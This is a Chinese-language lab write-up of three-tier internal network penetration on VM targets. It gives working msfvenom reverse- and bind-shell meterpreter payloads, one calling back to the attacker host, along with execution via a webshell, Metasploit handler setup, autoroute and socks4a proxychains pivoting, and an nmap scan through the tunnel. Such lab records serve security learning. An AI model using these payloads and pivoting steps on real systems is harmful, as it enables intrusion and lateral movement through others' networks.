kali攻击机ip:192.168.1.127
Target1靶机ip:192.168.1.147;192.168.22.131
Target2靶机ip:192.168.22.128;192.168.33.128
Target3靶机ip:192.168.33.33
0x00 前言
最近学到了内网渗透的知识,在这之前做了一个二级内网渗透的实验,然后听大佬说了一个CFS的靶场,所谓的CFS靶场,就是三层靶机的内网渗透通过一层一层的渗透,拿到三个内网主机的权限,接着,就有了这篇记录。
0x01 环境搭建
要想实现三层靶机的内网渗透,首先得要形成三个内网网段,所以环境就是如下的网络拓扑,在这里,攻击机的网段在192.168.1.0/24,另外三台靶机的ip地址分别如图所示,值的一提的是,第一靶机的ip网段要和攻击机的网段一样,因为在实战情况下,第一台靶机相当于连接外面的一台web服务,我们是有权对其进行访问的。
图中的前两台靶机都有两个网卡,而且网卡之间都存在联系,所以我们得手动在vm虚拟机中添加网卡,让其符合我们所需要的要求:
在vm中的编辑中,进行虚拟网络编辑器的配置,如图:
进去之后,我么看到的是如下界面:
我们在箭头处进行配置,
进去之后,我们可按照箭头的知识添加网络,或者设置网络的ip网段
这样一来,CFS三层靶机的搭建环境就算成功了
0x02 Target
<1>
a.获取meterpreter shell
这里我们假设已经直接拿到Target的shell(中间的漏洞利用过程不是本文重点,本文重点主要是内网代理的过程)。
通过这个已经获取的shell,我们要拿到对其的一个meterpreter shell。
(1).首先生成一个meterpreter后门文件
msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=192.168.1.127
LPORT=6666 SessionCommunicationTimeout=0 SessionExpirationTimeout=0 -
f elf >shell.elf
生成之后,将其传送到蚁剑的shell终端
(2).在kali中的msf终端上执行如下命令:
root@kali:~# msfconsole
msf5 > use exploit/multi/handler
msf5 exploit(multi/handler) > set payload linux/x64/meterpreter/reverse_tcp
msf5 exploit(multi/handler) > set lhost 0.0.0.0
msf5 exploit(multi/handler) > set lport 6666
msf5 exploit(multi/handler) > options
msf5 exploit(multi/handler) > run
(3).在蚁剑的shell终端上执行以下命令:
(www:/www/wwwroot/ThinkPHP/public) $ chmod 777 shell.elf
(www:/www/wwwroot/ThinkPHP/public) $ ./shell.elf
这样一操作,kali的msf终端上就出现了如下的结果:
成功的拿到了Target1的meterpreter shell。
b.设置代理
(1)在Target1中的meterpreter shell中添加路由
run autoroute -s 192.168.22.0/24
run autoroute -p
这样一来,msf框架就能访问到所添加路由所处的网段了,但是,这样只能是msf框架能够访问内网网段,又是我们还需通过kali上的其他应用或者是工具来进行渗透,所以我们就得利用另一种工具socks4模块了。
(2)添加socks4代理
在kali上执行以下命令:
msf5 > use auxiliary/server/socks4a
msf5 auxiliary(server/socks4a) > set srvport 2222
msf5 auxiliary(server/socks4a) > options
msf5 auxiliary(server/socks4a) > run
为了kali上的其他应用也能够访问到内网,我们需要利用kali自带的proxychains工具,所以还需对该工具进行文件配置:
root@kali:~# vim /etc/proxychains.conf
在打开的proxhchains中的配置文件添加如下内容:
socks4 192.168.1.127 2222
这样就能使kali上的其他应用通过刚建立的meterpreter shell中转跳板来访问内网网段。
<2>
前面说到,kali上的任何工具或者是应用都能访问到内网网段,也就是Target2所处的网段,所以我们就可以继续进行渗透。
a.获取meterpreter shell
假设我们通过某个漏洞已经在蚁剑上拿到了Target2的shell,那接下来的工作就是如何设置代理,而如何设置代理的最根本问题就是如何获取到Target2的meterpreter shell。
(1).生成MSF后门文件
root@kali:~# msfvenom -p linux/x64/meterpreter/bind_tcp LPORT=4321 -f elf > shell2.elf
(2).将其传送到已获取的Target2t2的蚁剑的shell上
(3).msf终端执行连接命令
msf5 > use exploit/multi/handler
msf5 exploit(multi/handler) > set payload linux/x64/meterpreter/bind_tcp
msf5 exploit(multi/handler) > set RHOST 192.168.22.128
msf5 exploit(multi/handler) > set LPORT 4321
msf5 exploit(multi/handler) > options
msf5 exploit(multi/handler) > run
(4).蚁剑shell终端开启监听命令。
(www:/www/wwwroot/upload) $ chmod 777 shell2.elf
(www:/www/wwwroot/upload) $ ./shell2.elf
(5).接着msf终端就拿到了Target2的meterpreter shell。
b.设置代理
设置代理的方法和上一次一样,在meterpreter shell里面添加一个路由,其主要目的就是通过这个路由来访问第三层内网。
run autoroute -s 192.168.33.0/24
run autoroute -p
在添加路由成功之后,msf终端就能够访问第三层内网了,此时在msf里面存在两个路由,第一个是第二层内网的路由,第二个是第三层内网的路由。由于先前已经在proxychains工具里面添加了本地代理,所以我们可以以同样的原理以第二个路由为中转跳板在kali上通过任意攻击工具对处于第三层网段的靶机进行攻击。
<3>
上面说到,msf以及kali上的任意工具都能攻击到第三层内网,所以我们通过平常的渗透手段来对其进行攻击。
root@kali:~# proxychains4 nmap -Pn -sT 192.168.33.33
扫描得到的结果:
至此,三层靶机渗透到此结束
end
本文始发于微信公众号(雷石安全实验室):CFS三层靶机内网渗透记录
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论